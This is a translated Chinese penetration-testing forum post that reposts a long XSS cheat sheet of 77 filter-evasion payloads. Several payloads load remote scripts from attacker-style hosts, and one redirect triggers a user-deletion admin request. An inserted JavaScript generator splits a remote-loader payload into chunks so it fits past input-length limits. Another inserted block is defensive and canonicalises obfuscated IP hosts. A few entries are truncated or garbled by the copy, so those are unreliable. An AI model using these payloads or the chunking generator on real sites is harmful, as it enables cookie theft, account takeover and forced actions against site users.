中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: XSS cross-site scripting attack roundup

Author: admin    Time: 2012-9-5 14:56
There doesn't seem to be much XSS material on t00ls, so when I saw this good stuff I copied it over, in case any of you want to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using the JavaScript directive (the copy repeated the <SCRIPT> tag from (1) here; this is the IMG form the heading refers to)
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entities (the semicolons are required here; the copy showed the &quot; references already decoded)
<IMG SRC=javascript:alert(&quot;XSS&quot;)>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) String.fromCharCode (use the XSS calculator to get the codes)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (use the XSS calculator)
<IMG SRC=jav..omitted..S')>
(the copy shows the references already decoded and truncated; the technique writes every character of javascript:alert('XSS') as a decimal character reference such as &#106;)

(9) 7-bit UTF-8 Unicode encoding without semicolons (use the XSS calculator)
<IMG SRC=jav..omitted..S')>
(as in (8), but the semicolons are left off the references, which browsers tolerate)

(10) Hex encoding, also without semicolons (use the XSS calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>

(11) Embedded tab splitting up the JavaScript (a literal tab character sits between jav and ascript; the copy collapsed it to a space)
<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab splitting up the JavaScript
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
(in (12)-(14) the copy showed the character reference already decoded to plain whitespace)

(15) Multiline injected JavaScript, the extreme case: one character per line (the copy had collapsed it onto a single line)
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>

(16) Getting around a character limit (all the pieces must land on the same page). Note that the forum software mangles eval( into eval_r( and expression( into expression_r(; the real keywords are used below. The closing tag is split as "</sc" + "ript>" so that no single piece contains "</script", which would end the enclosing <script> element.
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
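Added example, not part of the original post: a generator for the split form in (16). Given a payload and the number of characters a single input field accepts, it emits `<script>z=z+'...'</script>` pieces that each fit the limit, never cuts a JavaScript escape sequence in half, never lets the text `</script` appear inside one piece (the HTML parser would end the element there, which is why (16) splits it as `</sc` + `ript>`), and then reassembles the pieces the way the page would to confirm nothing was lost. Function names, the limit and the sample payload are my own choices.

```javascript
// Added example, not from the original post. Builds the chunked form of
// entry (16) for an arbitrary payload and per-field character limit.

const OPEN = "<script>z=z+'";          // every piece after the first
const CLOSE = "'</script>";
const FINAL = '<script>eval(z)</script>';

// Split `payload` into <script> elements of at most `limit` characters.
// Each piece holds a single-quoted JS string literal, so ' and \ are
// escaped, an escape sequence is never cut in half, and no piece contains
// "</script" (case-insensitively), which would terminate the element.
function chunkPayload(payload, limit) {
  const room = limit - OPEN.length - CLOSE.length;   // literal text per piece
  if (room < 2 || limit < FINAL.length) {
    throw new Error('limit too small: need room for ' + OPEN + CLOSE + ' and ' + FINAL);
  }
  const literals = [];
  let cur = '';
  for (const ch of payload) {
    const esc = ch === '\\' ? '\\\\' : ch === "'" ? "\\'" : ch;
    const candidate = cur + esc;
    if (candidate.length > room || candidate.toLowerCase().includes('</script')) {
      literals.push(cur);   // cur is non-empty here because room >= 2 >= esc.length
      cur = esc;
    } else {
      cur = candidate;
    }
  }
  if (cur) literals.push(cur);
  const pieces = literals.map((lit, i) => (i === 0 ? "<script>z='" : OPEN) + lit + CLOSE);
  pieces.push(FINAL);
  return pieces;
}

// Simulate the victim page: run the pieces in order and return the string
// that eval(z) would finally receive.
function assemble(pieces) {
  let z = '';
  for (const p of pieces) {
    const m = /^<script>z=(?:z\+)?'((?:[^'\\]|\\.)*)'<\/script>$/.exec(p);
    if (m) z += m[1].replace(/\\(.)/g, '$1');   // undo the \' and \\ escapes
  }
  return z;
}

// Sample payload (constructed): the same remote-script loader (16) builds.
const PAYLOAD = 'document.write("<script src=http://www.shell.net/1.js></script>")';

function demo(limit = 36) {
  const pieces = chunkPayload(PAYLOAD, limit);
  return { pieces, roundTrip: assemble(pieces) === PAYLOAD };
}

if (typeof require !== 'undefined' && require.main === module) {
  const { pieces, roundTrip } = demo();
  pieces.forEach(p => console.log(p.length.toString().padStart(2), p));
  console.log('reassembled correctly:', roundTrip);
}
```

With a limit of 36 the loader comes out as six `z=` pieces plus the `eval(z)` line; the piece boundary inside `</sc`/`ript>` is placed by the `</script` check, not by the character count. The same generator applies to any field with a maximum length, as long as the attacker controls several fields that render onto one page.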

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters are basically useless in China, since there's nowhere they can be exploited.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag (the &#14; control-character reference was decoded away in the copy)
<IMG SRC=" &#14;  javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2 (protocol-relative SRC)
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle bracket
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escape (breaking out of a quoted string)
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag (the copy showed only <BODY('XSS')>; the event handler that was stripped out is restored)
<BODY ONLOAD=alert('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META with an extra URL parameter
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters in front of the directive (any of decimal 1-32, 34, 39, 160, 8192-8&13 [sic], 12288, 65279 is accepted; the &#1; reference shown here as the example was decoded away in the copy)
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with the expression keyword split by a comment (the /*XSS*/ comment was stripped in the copy)
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (anything that starts with an open angle bracket and a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with expression (only the tail of this vector survived the copy)
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) ActionScript inside the Flash file can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code in an "image" file and load that instead (SRC is empty in the copy)
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command: the victim's browser fetches the URL with the victim's own cookies, so any action the target site performs on a plain GET is triggered (it sends a request, it does not execute arbitrary commands)
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command via redirect (a.jpg on the same server as the image tag; Apache Redirect directive)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT ="">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" '' SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL string evasion (IP address instead of a hostname)
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding (the copy showed it already decoded as http://3w.org; the percent-encoded form is restored)
<A HREF="http://%33%77%2E%6F%72%67">XSS</A>

(70) Dword IP
<A HREF="http://3232235521">XSS</A>

(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding (a newline and tabs inside the URL, which browsers discard; the copy shows them as plain whitespace)
<A HREF="h
tt	p://6	6.000146.0x7.147/">XSS</A>
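Added example, not part of the original post: entries (68) through (73) are all the same host, 192.168.0.1 or 66.102.7.147, written in forms a string match will not recognise. The code below does what a browser's URL parser does with them: it drops tab, newline and carriage return, accepts one to four dotted parts in decimal, hex or octal with the last part filling the remaining bytes, and reduces the result to dotted decimal before an allowlist comparison. Function names are mine; the inputs are the entries' own URLs.

```javascript
// Added example, not from the original post. Canonicalise the host of an
// href the way a browser does, so an allowlist compares like with like.

// One dotted part: 0x.. is hex, a leading 0 means octal, otherwise decimal.
// Returns null when the part is not numeric at all.
function parseIpPart(part) {
  let m;
  if ((m = /^0[xX]([0-9a-fA-F]*)$/.exec(part))) return m[1] === '' ? 0 : parseInt(m[1], 16);
  if ((m = /^0([0-7]+)$/.exec(part))) return parseInt(m[1], 8);
  if (/^[0-9]+$/.test(part)) return parseInt(part, 10);
  return null;
}

// Accept 1 to 4 parts; the last part fills all remaining bytes, so a single
// dword (70), hex parts (71), octal parts (72) and mixtures (73) all resolve.
// Returns dotted decimal, or null if the host is not an IPv4 literal.
function canonicalIpv4(host) {
  const parts = host.split('.');
  if (parts.length < 1 || parts.length > 4) return null;
  const nums = parts.map(parseIpPart);
  if (nums.some(n => n === null)) return null;
  const last = nums[nums.length - 1];
  if (nums.slice(0, -1).some(n => n > 255)) return null;
  if (last >= 256 ** (5 - nums.length)) return null;   // must fit the remaining bytes
  let value = last;
  nums.slice(0, -1).forEach((n, i) => { value += n * 256 ** (3 - i); });
  return [24, 16, 8, 0].map(shift => Math.floor(value / 2 ** shift) % 256).join('.');
}

// Extract the host from a raw href: discard tab/LF/CR anywhere (73), accept
// a scheme-less "//host" (74), drop userinfo, port and a trailing dot (76),
// then canonicalise numeric hosts.
function hostFromHref(raw) {
  const cleaned = raw.replace(/[\t\n\r]/g, '').trim();
  const m = /^(?:[a-z][a-z0-9+.-]*:)?\/\/([^/?#]*)/i.exec(cleaned);
  if (!m) return null;
  let host = m[1].replace(/^.*@/, '').replace(/:[0-9]*$/, '').toLowerCase();
  if (host.length > 1 && host.endsWith('.')) host = host.slice(0, -1);
  const ip = canonicalIpv4(host);
  return ip !== null ? ip : host;
}

// Allowlist check on the canonical host rather than on the raw string.
function hostAllowed(raw, allowedHosts) {
  const host = hostFromHref(raw);
  return host !== null && allowedHosts.includes(host);
}

// The hrefs from entries (68)-(76); (73) carries its tabs and newline as
// JavaScript escapes here.
const HREFS = [
  'http://127.0.0.1/',
  'http://3232235521',
  'http://0xc0.0xa8.0x00.0x01',
  'http://0300.0250.0000.0001',
  'h\ntt\tp://6\t6.000146.0x7.147/',
  '//www.google.com/',
  'http://google.com/',
  'http://www.google.com./',
];

function report() {
  return HREFS.map(h => [JSON.stringify(h), hostFromHref(h)]);
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const [raw, host] of report()) console.log(raw, '->', host);
}
```

Browsers and Node.js implement exactly these rules in their WHATWG URL parser, so in production code the comparison should be made against `new URL(href, base).hostname` rather than against the raw attribute; the hand-written version above only makes visible what that parser does to each entry.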

(74) Dropping the http: (protocol-relative URL)
<A HREF="//www.google.com/">XSS</A>

(75) Dropping the www
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>




Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2